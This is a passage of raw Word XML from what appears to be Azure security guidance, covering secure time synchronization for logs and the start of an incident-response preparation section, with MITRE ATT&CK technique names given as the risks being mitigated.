          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Log retention errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A975ED" w14:textId="45089A13" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Retention policies based on timestamp evaluation (delete logs older than 365 days) execute incorrectly with time drift—either deleting evidence prematurely or retaining logs beyond policy limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD31D0E" w14:textId="47B31DC3" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647F245D" w14:textId="6C8CC0F2" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61363B8C" w14:textId="7B31813A" w:rsidR="001C1F37" w:rsidRDefault="001C1F37" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001C1F37">
        <w:t>indicator removal (T1070) manipulating timestamps to hide malicious activity within legitimate time windows or make evidence appear outside investigation scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591DE5F3" w14:textId="77777777" w:rsidR="00284934" w:rsidRDefault="00284934" w:rsidP="00284934"/>
    <w:p w14:paraId="2F6E4757" w14:textId="3D566C73" w:rsidR="00284934" w:rsidRDefault="00284934" w:rsidP="00284934">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00284934">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LT-7.1: Configure secure time synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A7D005" w14:textId="5E745B1D" w:rsidR="00284934" w:rsidRDefault="00284934" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00284934">
        <w:t>Ensure accurate and consistent timestamps across all systems to enable reliable log correlation and incident timeline reconstruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76982BC8" w14:textId="366ED075" w:rsidR="00284934" w:rsidRDefault="00284934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00284934">
        <w:t>Configure Windows time sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E6D32" w14:textId="3C666443" w:rsidR="00284934" w:rsidRDefault="00284934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00284934">
        <w:t>Use Microsoft default NTP servers for time synchronization on Azure Windows compute resources leveraging Azure host time sources through virtualization integration services unless specific requirements dictate otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76784545" w14:textId="0A09801E" w:rsidR="00284934" w:rsidRDefault="00284934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00284934">
        <w:t>Configure Linux time sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EC6554" w14:textId="15DF2676" w:rsidR="00284934" w:rsidRDefault="00284934" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00284934">
        <w:t xml:space="preserve">Configure time synchronization for Azure Linux compute resources using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00284934">
        <w:t>chrony</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00284934">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00284934">
        <w:t>ntpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00284934">
        <w:t xml:space="preserve"> with Azure-provided NTP sources or appropriate external NTP servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E03855B" w14:textId="700D5847" w:rsidR="00284934" w:rsidRDefault="00284934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00284934">
        <w:t>Secure custom NTP servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF7FF37" w14:textId="58D69B2F" w:rsidR="00284934" w:rsidRDefault="00284934" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00284934">
        <w:t>If deploying custom network time protocol (NTP) servers, secure the UDP service port 123 and implement access controls restricting time service queries to authorized clients only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7E31B3" w14:textId="05DAF436" w:rsidR="00284934" w:rsidRDefault="00284934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00284934">
        <w:t>Validate timestamp formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F4315" w14:textId="0F9BC02D" w:rsidR="00284934" w:rsidRDefault="00284934" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00284934">
        <w:t>Verify that all logs generated by Azure resources include timestamps with time zone information (preferably UTC) by default to enable unambiguous timeline reconstruction across global deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E14AC6" w14:textId="2C91A147" w:rsidR="00284934" w:rsidRDefault="00284934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00284934">
        <w:t>Monitor time drift</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDDD3A7" w14:textId="3EDAF6B3" w:rsidR="00284934" w:rsidRDefault="00284934" w:rsidP="00790371">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00284934">
        <w:t>Implement continuous monitoring of time drift across systems and configure alerts for significant synchronization issues (&gt;5 seconds) that could impact log correlation, forensic analysis, and time-based authentication mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C83D54E" w14:textId="300C62F6" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="00F46D9F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc242449533"/>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Incident Response</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="594A30F6" w14:textId="29671EBD" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="00F46D9F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc242449534"/>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Prepare for incident response</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="189762BF" w14:textId="596E97EB" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="00F46D9F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc242449535"/>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>IR-1: Preparation - update incident response plan and handling process</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="122227CF" w14:textId="3BDBAD90" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5558A69D" w14:textId="27D6B742" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Develop and maintain comprehensive incident response plans specifically tailored for Azure environments, incorporating the shared responsibility model, cloud-native investigation capabilities, and automated response tools. Regularly test response procedures through tabletop exercises and simulations to ensure effectiveness and continuous improvement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237911CA" w14:textId="04E7E52C" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="36135BCD" w14:textId="6B2DF727" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Chaotic crisis response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF6FAF4" w14:textId="63D20A08" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:lastRenderedPageBreak/>
        <w:t>Lack of procedures, roles, and channels leads to confusion, delays, and ineffective action—extending dwell time and amplifying damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF89FD0" w14:textId="4DC6B50A" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Inadequate cloud-specific procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FF30CE" w14:textId="34B46559" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t xml:space="preserve">Traditional plans miss cloud shared responsibility </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>model</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>, investigation tools, and cloud forensics, causing incomplete response and evidence loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDD7558" w14:textId="5D1F3B23" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Missing stakeholder coordination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555B5616" w14:textId="3E7DCD46" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Absent communication protocols with cloud service providers, regulators, customers, and internal teams create delays, violations, and reputational harm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A701D35" w14:textId="1D21DAF0" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Untested response capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C142F36" w14:textId="5DBD5BD4" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Organizations discover gaps in tools, skills, and procedures during actual incidents rather than controlled testing environments, leading to failed containment and extended recovery times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF9635" w14:textId="7350BDCF" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Regulatory compliance failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE0C60" w14:textId="47304559" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Industries subject to incident notification requirements (HIPAA, PCI-DSS, GDPR, SOX) cannot meet mandatory reporting timelines without documented, tested response procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFB163B" w14:textId="232B401A" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Inadequate evidence preservation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EFF3C4" w14:textId="7DD76848" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Failure to establish proper evidence collection and retention procedures compromises forensic investigation, legal proceedings, and root cause analysis capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09418163" w14:textId="1F36368C" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FD43B0" w14:textId="58A22521" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EB025E" w14:textId="3BA4BEDB" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00830ED5">
        <w:t>impair defenses (T1562) exploiting gaps in incident response procedures to operate longer without detection or effective containment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4063DE6E" w14:textId="1C95B921" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3D3268" w14:textId="70D2F79D" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00830ED5">
        <w:t>data destruction (T1485) causing maximum damage when organizations lack rapid response capabilities for backup restoration and system recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5469F0" w14:textId="71C198CC" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CA6771" w14:textId="1F7EF5D3" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00830ED5">
        <w:t>data staged for exfiltration (T1074) taking advantage of delayed detection and response to complete data theft operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652BE52E" w14:textId="7F311FB8" w:rsidR="00DC2CC4" w:rsidRDefault="00F46D9F" w:rsidP="00F46D9F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IR-1.1: Develop Azure-specific incident response plans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDF210A" w14:textId="4AC40C08" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Azure incident response plan development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BAFFA1" w14:textId="7ECE0B82" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Shared responsibility model integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392974C7" w14:textId="06800F8D" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Clear delineation of responsibilities between Microsoft and customer for different service types (IaaS, PaaS, SaaS) in incident response activities using the Azure shared responsibility model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD96E9C" w14:textId="6B492D55" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Azure-Native Investigation Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A52DF" w14:textId="79D5A477" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:lastRenderedPageBreak/>
        <w:t>Leveraging Azure Monitor logs, Microsoft Entra ID audit logs, Microsoft Entra ID sign-in logs, Network Security Group flow logs, and Microsoft Defender for Cloud alerts for comprehensive incident investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482AF436" w14:textId="44A98884" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Cloud-Specific Evidence Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A93DEB" w14:textId="225CB853" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Procedures for VM snapshots, memory dumps, network packet captures, and log collection across Azure services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269303A0" w14:textId="27BC2B6E" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Microsoft Collaboration Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600408D8" w14:textId="1F829FD6" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Established processes for engaging Microsoft Support, Azure Security Response Team, and Microsoft Security Response Center (MSRC) when needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F90E69B" w14:textId="28B411C7" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Azure resource isolation procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115FA464" w14:textId="3C22B011" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Specific steps for isolating compromised VMs, containers, storage accounts, and other Azure resources during incident containment (see Defender for Cloud alert handling &amp; isolation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D151C31" w14:textId="6ABDCE9F" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Microsoft Defender for Cloud integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FC0BB7" w14:textId="1DCD6C26" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Security contact configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D3265" w14:textId="3A04DCDE" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Designated security contacts for incident notifications with 24/7 availability and escalation procedures (Configure security contacts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7724BD" w14:textId="29F74D31" w:rsidR="00F46D9F" w:rsidRDefault="00F46D9F" w:rsidP="002212DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F46D9F">
        <w:t>Alert Severity Mapping</w:t>
      </w:r>
    </w:p>
